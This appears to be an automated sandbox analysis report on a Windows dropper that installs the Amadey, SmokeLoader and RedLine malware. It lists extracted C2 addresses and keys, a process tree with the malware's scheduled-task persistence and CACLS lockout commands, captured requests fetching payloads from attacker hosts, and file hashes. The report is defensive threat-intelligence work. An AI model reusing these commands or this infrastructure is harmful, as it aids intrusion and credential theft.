Analysis

  • max time kernel
    151s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20230703-en locale:en-us os:windows10-2004-x64 system
  • submitted
    22/07/2023, 07:01 UTC

General

  • Target: 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
  • Size: 514KB
  • MD5: 359185cd139e6394a2c2dadee1076043
  • SHA1: f7b24aff5b24c399611f10ab59708f81f4fe95ea
  • SHA256: 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa
  • SHA512: 6438e2ba152a2f45e292207480e71c0ed53b8ffe82e5ca4d3a2d2a914358c37f826692d8134fc899135019ec47cc7d57e84650b33d1a86a9c5e612b864027d05
  • SSDEEP: 12288:dMr7y90QVj5N59ZZxOQgRWiEBhXAcB3HvPvME8NFXMq:+yp1fSQgRWim5N8N6q

Malware Config

Extracted

  • Family: amadey
  • Version: 3.85
  • C2: 77.91.68.3/home/love/index.php

Extracted

  • Family: smokeloader
  • Version: 2022
  • C2: http://77.91.68.29/fks/
  • rc4.i32  1  0x4b3b02b6
  • rc4.i32  1  0x6ea683ed

Extracted

  • Family: redline
  • Botnet: grom
  • C2: 77.91.68.68:19071
  • Attributes
    • auth_value: 9ec3129bff410b89097d656d7abc33dc

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Healer an antivirus disabler dropper (3 IoCs)
  • Healer

    Healer, an antivirus disabler dropper.

  • Modifies Windows Defender Real-time Protection settings (3 TTPs, 6 IoCs)
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Downloads MZ/PE file
  • Checks computer location settings (2 TTPs, 3 IoCs)

    Looks up the country code configured in the registry, likely a geofence.

  • Executes dropped EXE (10 IoCs)
  • Loads dropped DLL (4 IoCs)
  • Windows security modification (2 TTPs, 1 IoCs)
  • Adds Run key to start application (2 TTPs, 6 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) (3 TTPs, 3 IoCs)

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) (1 TTPs, 1 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class (1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (19 IoCs)
  • Suspicious use of FindShellTrayWindow (1 IoCs)
  • Suspicious use of WriteProcessMemory (61 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
    "C:\Users\Admin\AppData\Local\Temp\44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe"
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:5088
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exe
          • Modifies Windows Defender Real-time Protection settings
          • Executes dropped EXE
          • Windows security modification
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1824
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3784
          • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
            "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2812
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
              • Creates scheduled task(s)
              PID:880
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit
              • Suspicious use of WriteProcessMemory
              PID:4952
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                PID:2184
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "danke.exe" /P "Admin:N"
                PID:756
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "danke.exe" /P "Admin:R" /E
                PID:2160
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                PID:1848
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "..\3ec1f323b5" /P "Admin:N"
                PID:2880
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "..\3ec1f323b5" /P "Admin:R" /E
                PID:3412
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
              • Loads dropped DLL
              PID:3416
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:4152
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe
      • Executes dropped EXE
      PID:60
  • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    • Executes dropped EXE
    PID:2468
  • C:\Users\Admin\AppData\Local\Temp\18DD.exe
    C:\Users\Admin\AppData\Local\Temp\18DD.exe
    • Checks computer location settings
    • Executes dropped EXE
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1836
    • C:\Windows\SysWOW64\control.exe
      "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3792
        • C:\Windows\system32\RunDll32.exe
          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
          • Suspicious use of WriteProcessMemory
          PID:2776
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
            • Loads dropped DLL
            PID:5088
  • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    • Executes dropped EXE
    PID:2956

Network

  • DNS (US): 146.78.124.51.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 146.78.124.51.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 8.3.197.209.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 8.3.197.209.in-addr.arpa IN PTR
    Response: 8.3.197.209.in-addr.arpa IN PTR vip0x008.map2.ssl.hwcdn.net
  • DNS (US): 23.159.190.20.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 23.159.190.20.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 95.221.229.192.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 95.221.229.192.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 55.36.223.20.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 55.36.223.20.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 208.240.110.104.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 208.240.110.104.in-addr.arpa IN PTR
    Response: 208.240.110.104.in-addr.arpa IN PTR a104-110-240-208.deploy.static.akamaitechnologies.com
  • POST (FI): http://77.91.68.3/home/love/index.php
    Process: danke.exe
    Remote address: 77.91.68.3:80
    Request:
      POST /home/love/index.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 77.91.68.3
      Content-Length: 89
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Date: Sat, 22 Jul 2023 07:02:21 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 6
      Content-Type: text/html; charset=UTF-8
  • DNS (US): 3.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 3.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 3.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 3.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 3.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 3.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • POST (FI): http://77.91.68.29/fks/
    Remote address: 77.91.68.29:80
    Request:
      POST /fks/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://fpeumd.net/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 233
      Host: 77.91.68.29
    Response:
      HTTP/1.1 404 Not Found
      Date: Sat, 22 Jul 2023 07:02:41 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 7
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=utf-8
  • POST (FI): http://77.91.68.29/fks/
    Remote address: 77.91.68.29:80
    Request:
      POST /fks/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://pmfwrats.net/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 192
      Host: 77.91.68.29
    Response:
      HTTP/1.1 404 Not Found
      Date: Sat, 22 Jul 2023 07:02:41 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 43
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=utf-8
  • DNS (US): 29.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 29.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 29.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 29.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 29.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 29.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 88.156.103.20.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 88.156.103.20.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 59.128.231.4.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 59.128.231.4.in-addr.arpa IN PTR
    Response: (empty)
  • POST (FI): http://77.91.68.29/fks/
    Remote address: 77.91.68.29:80
    Request:
      POST /fks/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://sneqxkmhcg.net/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 248
      Host: 77.91.68.29
    Response:
      HTTP/1.1 404 Not Found
      Date: Sat, 22 Jul 2023 07:03:02 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 47
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=utf-8
  • GET (FI): http://77.91.68.3/home/love/Plugins/cred64.dll
    Process: danke.exe
    Remote address: 77.91.68.3:80
    Request:
      GET /home/love/Plugins/cred64.dll HTTP/1.1
      Host: 77.91.68.3
    Response:
      HTTP/1.1 404 Not Found
      Date: Sat, 22 Jul 2023 07:03:11 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 272
      Content-Type: text/html; charset=iso-8859-1
  • GET (FI): http://77.91.68.3/home/love/Plugins/clip64.dll
    Process: danke.exe
    Remote address: 77.91.68.3:80
    Request:
      GET /home/love/Plugins/clip64.dll HTTP/1.1
      Host: 77.91.68.3
    Response:
      HTTP/1.1 200 OK
      Date: Sat, 22 Jul 2023 07:03:11 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
      ETag: "16400-5ffd5f45b7dbc"
      Accept-Ranges: bytes
      Content-Length: 91136
      Content-Type: application/x-msdos-program
  • POST (FI): http://77.91.68.29/fks/
    Remote address: 77.91.68.29:80
    Request:
      POST /fks/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://nihtya.org/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 238
      Host: 77.91.68.29
    Response:
      HTTP/1.1 404 Not Found
      Date: Sat, 22 Jul 2023 07:03:23 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 47
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=utf-8
  • DNS (US): 11.227.111.52.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 11.227.111.52.in-addr.arpa IN PTR
    Response: (empty)
  • POST (FI): http://77.91.68.29/fks/
    Remote address: 77.91.68.29:80
    Request:
      POST /fks/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://grdguk.com/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 197
      Host: 77.91.68.29
    Response:
      HTTP/1.1 404 Not Found
      Date: Sat, 22 Jul 2023 07:03:44 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 45
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=utf-8
  • POST (FI): http://77.91.68.29/fks/
    Remote address: 77.91.68.29:80
    Request:
      POST /fks/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://opilmtwth.net/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 337
      Host: 77.91.68.29
    Response:
      HTTP/1.1 404 Not Found
      Date: Sat, 22 Jul 2023 07:03:45 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 403
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=utf-8
  • GET (FI): http://77.91.68.30/fuzz/raman.exe
    Remote address: 77.91.68.30:80
    Request:
      GET /fuzz/raman.exe HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Host: 77.91.68.30
    Response:
      HTTP/1.1 200 OK
      Date: Sat, 22 Jul 2023 07:03:44 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Sat, 22 Jul 2023 06:50:34 GMT
      ETag: "184e8e-6010dcc4c0280"
      Accept-Ranges: bytes
      Content-Length: 1592974
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdos-program
  • DNS (US): 30.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 30.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 30.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 30.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 30.68.91.77.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 30.68.91.77.in-addr.arpa IN PTR
    Response: (empty)
  • DNS (US): 27.178.89.13.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 27.178.89.13.in-addr.arpa IN PTR
    Response: (empty)
  • 77.91.68.3:80  http://77.91.68.3/home/love/index.php  http  danke.exe  515 B  365 B  6  5
    HTTP Request: POST http://77.91.68.3/home/love/index.php
    HTTP Response: 200
  • 77.91.68.68:19071  d8279993.exe  260 B  5
  • 77.91.68.29:80  http://77.91.68.29/fks/  http  1.4kB  842 B  9  9
    HTTP Request: POST http://77.91.68.29/fks/
    HTTP Response: 404
    HTTP Request: POST http://77.91.68.29/fks/
    HTTP Response: 404
  • 77.91.124.31:80  260 B  5
  • 77.91.68.68:19071  d8279993.exe  260 B  5
  • 77.91.68.29:80  http://77.91.68.29/fks/  http  834 B  510 B  7  6
    HTTP Request: POST http://77.91.68.29/fks/
    HTTP Response: 404
  • 77.91.124.31:80  260 B  5
  • 77.91.68.3:80  http://77.91.68.3/home/love/Plugins/clip64.dll  http  danke.exe  3.9kB  94.8kB  76  74
    HTTP Request: GET http://77.91.68.3/home/love/Plugins/cred64.dll
    HTTP Response: 404
    HTTP Request: GET http://77.91.68.3/home/love/Plugins/clip64.dll
    HTTP Response: 200
  • 77.91.68.68:19071  d8279993.exe  260 B  5
  • 77.91.68.29:80  http://77.91.68.29/fks/  http  820 B  510 B  7  6
    HTTP Request: POST http://77.91.68.29/fks/
    HTTP Response: 404
  • 77.91.124.31:80  260 B  5
  • 77.91.68.29:80  http://77.91.68.29/fks/  http  1.5kB  1.2kB  10  9
    HTTP Request: POST http://77.91.68.29/fks/
    HTTP Response: 404
    HTTP Request: POST http://77.91.68.29/fks/
    HTTP Response: 404
  • 77.91.68.30:80  http://77.91.68.30/fuzz/raman.exe  http  56.4kB  1.6MB  1090  1176
    HTTP Request: GET http://77.91.68.30/fuzz/raman.exe
    HTTP Response: 200
  • 77.91.68.68:19071  d8279993.exe  260 B  5
  • 77.91.68.68:19071  d8279993.exe  260 B  5
  • 8.8.8.8:53  146.78.124.51.in-addr.arpa  dns  72 B  158 B  1  1
    DNS Request: 146.78.124.51.in-addr.arpa
  • 8.8.8.8:53  8.3.197.209.in-addr.arpa  dns  70 B  111 B  1  1
    DNS Request: 8.3.197.209.in-addr.arpa
  • 8.8.8.8:53  23.159.190.20.in-addr.arpa  dns  72 B  158 B  1  1
    DNS Request: 23.159.190.20.in-addr.arpa
  • 8.8.8.8:53  95.221.229.192.in-addr.arpa  dns  73 B  144 B  1  1
    DNS Request: 95.221.229.192.in-addr.arpa
  • 8.8.8.8:53  55.36.223.20.in-addr.arpa  dns  71 B  157 B  1  1
    DNS Request: 55.36.223.20.in-addr.arpa
  • 8.8.8.8:53  208.240.110.104.in-addr.arpa  dns  74 B  141 B  1  1
    DNS Request: 208.240.110.104.in-addr.arpa
  • 8.8.8.8:53  3.68.91.77.in-addr.arpa  dns  207 B  207 B  3  3
    DNS Request: 3.68.91.77.in-addr.arpa
    DNS Request: 3.68.91.77.in-addr.arpa
    DNS Request: 3.68.91.77.in-addr.arpa
  • 8.8.8.8:53  29.68.91.77.in-addr.arpa  dns  210 B  210 B  3  3
    DNS Request: 29.68.91.77.in-addr.arpa
    DNS Request: 29.68.91.77.in-addr.arpa
    DNS Request: 29.68.91.77.in-addr.arpa
  • 8.8.8.8:53  88.156.103.20.in-addr.arpa  dns  72 B  158 B  1  1
    DNS Request: 88.156.103.20.in-addr.arpa
  • 8.8.8.8:53  59.128.231.4.in-addr.arpa  dns  71 B  157 B  1  1
    DNS Request: 59.128.231.4.in-addr.arpa
  • 8.8.8.8:53  11.227.111.52.in-addr.arpa  dns  72 B  158 B  1  1
    DNS Request: 11.227.111.52.in-addr.arpa
  • 8.8.8.8:53  30.68.91.77.in-addr.arpa  dns  210 B  210 B  3  3
    DNS Request: 30.68.91.77.in-addr.arpa
    DNS Request: 30.68.91.77.in-addr.arpa
    DNS Request: 30.68.91.77.in-addr.arpa
  • 8.8.8.8:53  27.178.89.13.in-addr.arpa  dns  71 B  145 B  1  1
    DNS Request: 27.178.89.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\18DD.exe
    Filesize: 1.5MB
    MD5: 76fd6676743cf24b0f2011f4ca153f51
    SHA1: d90dbad79132048524d3c6f4fafdc1dff1128070
    SHA256: ae6b43b8b3a5c1e1f03671fb09015a59e3224dcf3f8b7aa84183407d4f111b92
    SHA512: 3d091278b1e359ebc8406b6422527768705a54ea7b7b0c1aacd31c9ecdcb24ba3bf0269e55dc72a666cce7ac5cc3ca4165d13c783f9bf871d223fccfa4025de5

  • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    Filesize: 228KB
    MD5: be4091357bb914de71e288c65678a19c
    SHA1: 349f9335ac78528e05450ad5d83d890c98b2588e
    SHA256: d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
    SHA512: 106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444

              • C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl

                Filesize

                1.3MB

                MD5

                9f0cd2d6ab20bfe5e37bcf5e3f7d156e

                SHA1

                13dafab2c1f38b8e7ddeef055436f42ef175d384

                SHA256

                e1ab9f9baaf156a0f791c76e393621bb3af38d2483aadfab91345d4c0d4fa498

                SHA512

                bd1668d8938083dddd628f209f2f921439c723d7dbeaa8b9b094282cc1e809b34d8f0294c777a9718922f9ac6d86138327ae9fee56561848779d783e186e7df7

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe

                Filesize

                173KB

                MD5

                cc911bee2e374dd2ee47ca2faf4f1b95

                SHA1

                ae956f838b9e251026e19c10b70aa4f9f6f51103

                SHA256

                f2c4ec8bf0ea81530b5bb84d00ed484652ab093e1cbb63b27b35cdd134e853ee

                SHA512

                7c89dbe8a9a835026854e95344763131c98acd987e443180f80b941d42f4e55a9f491c0dd35f8c1677d5d6e7b3caad5a5c3dda0d8713e8653dd1013021617226

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe

                Filesize

                359KB

                MD5

                f471bd967550727b5cdf9b7f0c8e3bbf

                SHA1

                87a64fa5523cf933a65268c01b7e42504cc44e86

                SHA256

                97de47c8eefec7dcd225130f2f6508a88304875bc83d6ef2b7ad072c562cf8fe

                SHA512

                e6934029eacbb50436d410ae512e1da1634e6ebd8b3b1f0ff42a8099d0ad3f702f730622fc2ea46316fcf474b1767452cf6dbbe4d659decb32ee065c943ff2e3

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe

                Filesize

                33KB

                MD5

                41207187a052b1304acc8f89494f9bed

                SHA1

                8e912d6295c143dc42f9dd0388d00d0dc4717189

                SHA256

                b0a448370cbab4bf8414da1577f3790f39b442d8860948edf652100b033d3405

                SHA512

                52d36fac30714b815caf391191b4d1a8855e7f323c5b1455a01ce2636647f1da54c9d4c2fd6cb89be90781fa397963848791c4b6a2d76c2ad3624d767f17e597

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe

                Filesize

                235KB

                MD5

                f681aeef0068a3b7b72d1785015ed9c4

                SHA1

                3416fd75188c5670108e83294f06c3cf3f3f3fdb

                SHA256

                91f5e55b4cc956dad58e8ef6e88602aa70d20de01dbc8d5d023bf48968bd1d98

                SHA512

                2a7cb87ceffe5cec6dddc1f8debbdcf9a12d614a7b98131f431aa637c8eb1dd295f3fca0b857883263fe1fab473c57c5ddadbd364dd714525a0ab1277c2afb01

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exe

                Filesize

                11KB

                MD5

                a4dc38608f89d2c490491b00bff16ea1

                SHA1

                5872ab174f0c869dea4cf2138cf37bb425eb3f7a

                SHA256

                309b99c3c6461e005c7fba2b1a249e7c008a7ca5d8eb026eff1a16d2e098c433

                SHA512

                c705e9328830d340f1fa2b940cdcdbaee7a34ce526f0d85c9aad7a396ca18698cfdc1c35b8120e0d11feea4a31adac956731cc25b5c6111c5ccd8695b3ff9866

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe

                Filesize

                228KB

                MD5

                be4091357bb914de71e288c65678a19c

                SHA1

                349f9335ac78528e05450ad5d83d890c98b2588e

                SHA256

                d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422

                SHA512

                106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444

              • C:\Users\Admin\AppData\Local\Temp\c~4fhr.cpl

                Filesize

                1.3MB

                MD5

                9f0cd2d6ab20bfe5e37bcf5e3f7d156e

                SHA1

                13dafab2c1f38b8e7ddeef055436f42ef175d384

                SHA256

                e1ab9f9baaf156a0f791c76e393621bb3af38d2483aadfab91345d4c0d4fa498

                SHA512

                bd1668d8938083dddd628f209f2f921439c723d7dbeaa8b9b094282cc1e809b34d8f0294c777a9718922f9ac6d86138327ae9fee56561848779d783e186e7df7

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                dc587d08b8ca3cd62e5dc057d41a966b

                SHA1

                0ba6a88377c74a0c53b956d405ad17dd5f8c4164

                SHA256

                7d8f216ba04419aae32d5902449a0c5271ed577c722e582fb42e7d43b3b08426

                SHA512

                7300ecc40bfa1129d907a9b074e8406fa01b5ff893c7c281e4441f8cc6a546bcb5e099d6635b2f9714ec1f0453dc41de19f2fca3475f36f62babc425892699a9

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

                Filesize

                272B

                MD5

                d867eabb1be5b45bc77bb06814e23640

                SHA1

                3139a51ce7e8462c31070363b9532c13cc52c82d

                SHA256

                38c69e3f9f3927f8178d55cde9774a2b170c057b349b73932b87b76499d03349

                SHA512

                afc40d5fa7bcd41b8445f597990d150d57e3621ddef9400af742471aa0d14c2e66cfecc34482dadbaeb6f20912fda8ab786e584bf7fd1ad5fa23d3b95425fd59

              • memory/60-189-0x0000000073430000-0x0000000073BE0000-memory.dmp

                Filesize

                7.7MB

              • memory/60-190-0x0000000005290000-0x00000000052A0000-memory.dmp

                Filesize

                64KB

              • memory/60-188-0x000000000A960000-0x000000000A99C000-memory.dmp

                Filesize

                240KB

              • memory/60-186-0x000000000A900000-0x000000000A912000-memory.dmp

                Filesize

                72KB

              • memory/60-187-0x0000000005290000-0x00000000052A0000-memory.dmp

                Filesize

                64KB

              • memory/60-185-0x000000000A9C0000-0x000000000AACA000-memory.dmp

                Filesize

                1.0MB

              • memory/60-184-0x000000000AE80000-0x000000000B498000-memory.dmp

                Filesize

                6.1MB

              • memory/60-183-0x0000000073430000-0x0000000073BE0000-memory.dmp

                Filesize

                7.7MB

              • memory/60-182-0x0000000000A10000-0x0000000000A40000-memory.dmp

                Filesize

                192KB

              • memory/1824-154-0x00000000008F0000-0x00000000008FA000-memory.dmp

                Filesize

                40KB

              • memory/1824-155-0x00007FFD6D200000-0x00007FFD6DCC1000-memory.dmp

                Filesize

                10.8MB

              • memory/1824-157-0x00007FFD6D200000-0x00007FFD6DCC1000-memory.dmp

                Filesize

                10.8MB

              • memory/3136-175-0x0000000002970000-0x0000000002986000-memory.dmp

                Filesize

                88KB

              • memory/3792-230-0x0000000003200000-0x00000000032FE000-memory.dmp

                Filesize

                1016KB

              • memory/3792-226-0x0000000000F40000-0x0000000000F46000-memory.dmp

                Filesize

                24KB

              • memory/3792-231-0x0000000003200000-0x00000000032FE000-memory.dmp

                Filesize

                1016KB

              • memory/3792-233-0x0000000003200000-0x00000000032FE000-memory.dmp

                Filesize

                1016KB

              • memory/3792-234-0x0000000003200000-0x00000000032FE000-memory.dmp

                Filesize

                1016KB

              • memory/3792-227-0x0000000000400000-0x0000000000552000-memory.dmp

                Filesize

                1.3MB

              • memory/3792-229-0x00000000030E0000-0x00000000031F9000-memory.dmp

                Filesize

                1.1MB

              • memory/4152-176-0x0000000000400000-0x0000000000409000-memory.dmp

                Filesize

                36KB

              • memory/4152-174-0x0000000000400000-0x0000000000409000-memory.dmp

                Filesize

                36KB

              • memory/5088-237-0x0000000002820000-0x0000000002972000-memory.dmp

                Filesize

                1.3MB

              • memory/5088-238-0x0000000002340000-0x0000000002346000-memory.dmp

                Filesize

                24KB

              • memory/5088-239-0x0000000002820000-0x0000000002972000-memory.dmp

                Filesize

                1.3MB

              • memory/5088-242-0x0000000002C00000-0x0000000002D19000-memory.dmp

                Filesize

